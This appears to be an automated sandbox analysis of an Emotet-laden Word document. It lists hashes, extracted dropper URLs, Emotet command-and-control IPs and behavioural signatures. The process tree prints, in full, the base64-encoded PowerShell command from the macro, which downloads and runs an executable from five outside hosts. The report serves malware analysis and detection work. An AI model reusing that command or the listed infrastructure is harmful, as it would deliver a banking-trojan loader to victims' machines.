Analysis
-
max time kernel
57s -
max time network
55s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
17-07-2020 16:53
Static task
static1
General
-
Target
bf72069bdf671e14c551ae12b4b287ab44dc12df4096be4506cb9602154c5421.doc
-
Size
196KB
-
MD5
9ae2bc9a480ad81eb6cd356f8c3c0672
-
SHA1
b0028bc4e634026c2eb9020644d4a3b3cf39a13f
-
SHA256
bf72069bdf671e14c551ae12b4b287ab44dc12df4096be4506cb9602154c5421
-
SHA512
7874f8bad567133132806528a557a639464169373d224cad5ddbd37fecb9f01a812d64dcbba7b4437bc23901a402c3bedc0ee75756409d2991b276d40da02e65
Malware Config
Extracted
http://topgameus.com/AutoIT_UngdungOnline/zqjqel/
http://cpads.net/7iuhq/mri/
https://tyres2c.com/wp-admin/zu2h/
https://thesuperservice.com/wp-admin/rL00/
https://ssuse.com/wp-content/uploads/IMv2xyEc3/
Extracted
emotet
109.117.53.230:443
212.51.142.238:8080
190.160.53.126:80
139.59.60.244:8080
91.211.88.52:7080
190.108.228.62:443
186.208.123.210:443
46.105.131.87:80
173.91.22.41:80
222.214.218.37:4143
31.31.77.83:443
62.75.141.82:80
93.156.165.186:80
93.51.50.171:8080
185.94.252.104:443
78.189.165.52:8080
95.179.229.244:8080
73.11.153.178:8080
203.153.216.189:7080
95.213.236.64:8080
79.98.24.39:8080
41.60.200.34:80
61.19.246.238:443
104.131.11.150:443
162.241.92.219:8080
104.131.44.150:8080
58.153.68.176:80
153.126.210.205:7080
62.138.26.28:8080
168.235.67.138:7080
103.86.49.11:8080
116.203.32.252:8080
87.106.139.101:8080
101.187.97.173:80
113.160.130.116:8443
75.139.38.211:80
201.173.217.124:443
60.130.173.117:80
139.130.242.43:80
110.143.151.194:80
46.105.131.79:8080
162.154.38.103:80
121.124.124.40:7080
137.59.187.107:8080
81.2.235.111:8080
110.145.77.103:80
109.74.5.95:8080
200.41.121.90:80
91.205.215.66:443
108.48.41.69:80
176.111.60.55:8080
24.1.189.87:8080
190.144.18.198:80
87.106.136.232:8080
5.196.74.210:8080
209.141.54.221:8080
50.116.86.205:8080
78.24.219.147:8080
210.165.156.91:80
37.187.72.193:8080
157.245.99.39:8080
190.55.181.54:443
37.139.21.175:8080
169.239.182.217:8080
104.236.246.93:8080
200.55.243.138:8080
74.208.45.104:8080
5.39.91.110:7080
79.7.158.208:80
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4000 677.exe 3608 wlidcli.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4000 wrote to memory of 3608 4000 677.exe 78 PID 4000 wrote to memory of 3608 4000 677.exe 78 PID 4000 wrote to memory of 3608 4000 677.exe 78 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\NaturalLanguage6\wlidcli.exe 677.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3988 WINWORD.EXE 3988 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3456 powersheLL.exe 3456 powersheLL.exe 3456 powersheLL.exe 3608 wlidcli.exe 3608 wlidcli.exe 3608 wlidcli.exe 3608 wlidcli.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3456 powersheLL.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 18 3456 powersheLL.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 3988 WINWORD.EXE 4000 677.exe 4000 677.exe 3608 wlidcli.exe 3608 wlidcli.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3456 676 powersheLL.exe 66
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bf72069bdf671e14c551ae12b4b287ab44dc12df4096be4506cb9602154c5421.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAFQAeQBgAHAAUgBPAHQATwBjAGAAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAdABoAGUAZQBjAGgAaABvAGEAeABiAGEAaQBuAGwAbwBoAHIAZQB1AGcAcABvAGEAcQB1ACAAPQAgACcANgA3ADcAJwA7ACQAYwBoAGEAaQB4AHcAZQBlAHgAPQAnAHgAYQBvAHMAJwA7ACQAYwBoAGEAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdABoAGUAZQBjAGgAaABvAGEAeABiAGEAaQBuAGwAbwBoAHIAZQB1AGcAcABvAGEAcQB1ACsAJwAuAGUAeABlACcAOwAkAGoAZQBhAG0AYwBoAGEAYgA9ACcAcQB1AGEAZQBmAHkAbwB1AGwAcABvAHUAdwBqAGEAaQBoAHQAdQBhAHIAJwA7ACQAdABoAGEAZQBxAHUAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAEIAQwBMAGkARQBuAFQAOwAkAHQAaQBhAGcAeQBvAHUAcwB2AHUAdQBiAD0AJwBoAHQAdABwADoALwAvAHQAbwBwAGcAYQBtAGUAdQBzAC4AYwBvAG0ALwBBAHUAdABvAEkAVABfAFUAbgBnAGQAdQBuAGcATwBuAGwAaQBuAGUALwB6AHEAagBxAGUAbAAvACoAaAB0AHQAcAA6AC8ALwBjAHAAYQBkAHMALgBuAGUAdAAvADcAaQB1AGgAcQAvAG0AcgBpAC8AKgBoAHQAdABwAHMAOgAvAC8AdAB5AHIAZQBzADIAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AegB1ADIAaAAvACoAaAB0AHQAcABzADoALwAvAHQAaABlAHMAdQBwAGUAcgBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwByAEwAMAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBzAHUAcwBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEkATQB2ADIAeAB5AEUAYwAzAC8AJwAuACIAcwBwAGAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABiAG8AdQBtAHkAYQBvAG0AaABvAGkAegBqAGUAaQBuAGYAZQBpAHYAPQAnAGYAaQBvAHQAaABnAG8AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeABlAGUAeABjAGUAYwBoACAAaQBuACAAJAB0AGkAYQBnAHkAbwB1AHMAdgB1AHUAYgApAHsAdAByAHkAewAkAHQAaABhAGUAcQB1AC4AIgBEAGAAbwBXAG4ATABPAGAAQQBkAEYAYABpAGwARQAiACgAJAB4AGUAZQB4AGMAZQBjAGgALAAgACQAYwBoAGEAeQApADsAJABtAGEAZQByAGIAbwBlAHAAYwB1AGEAZwA9ACcAdgBlAGEAYgB0AHUAcAByAHUAdQBsAGMAaABpAGEAegBiAG8AYQBoACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBoAGEAeQApAC4AIgBMAGUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA2ADcANgA0ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIARQBhAGAAVABlACIAKAAkAGMAaABhAHkAKQA7ACQAYwBlAGMAaABjAGEAdQB0AHQAaABlAG8AcQB1AHMAbwBlAG0APQAnAGoAbwBpAGsAagBvAGEAcABkAGkAZQBzACcAOwBiAHIAZQBhAGsAOwAkAGcAYQB1AGcAeQB1AHkAcgB1AHkAeQB1AG4AYgB1AHUAZgBrAGUAcgA9ACcAdABpAGEAdwBmAGUAbwBjAGYAYQBpAHMAagBhAGUAZgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwAGkAeAB3AHUAegB2AG8AYQBtAGwAdQB1AHMAagBvAG8AeQBrAGkAbQA9ACcAcwBpAGMAaABrAGUAaQBnAHYAbwBhAGMAJwA=1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Process spawned unexpected child process
PID:3456
-
C:\Users\Admin\677.exeC:\Users\Admin\677.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4000 -
C:\Windows\SysWOW64\NaturalLanguage6\wlidcli.exe"C:\Windows\SysWOW64\NaturalLanguage6\wlidcli.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3608
-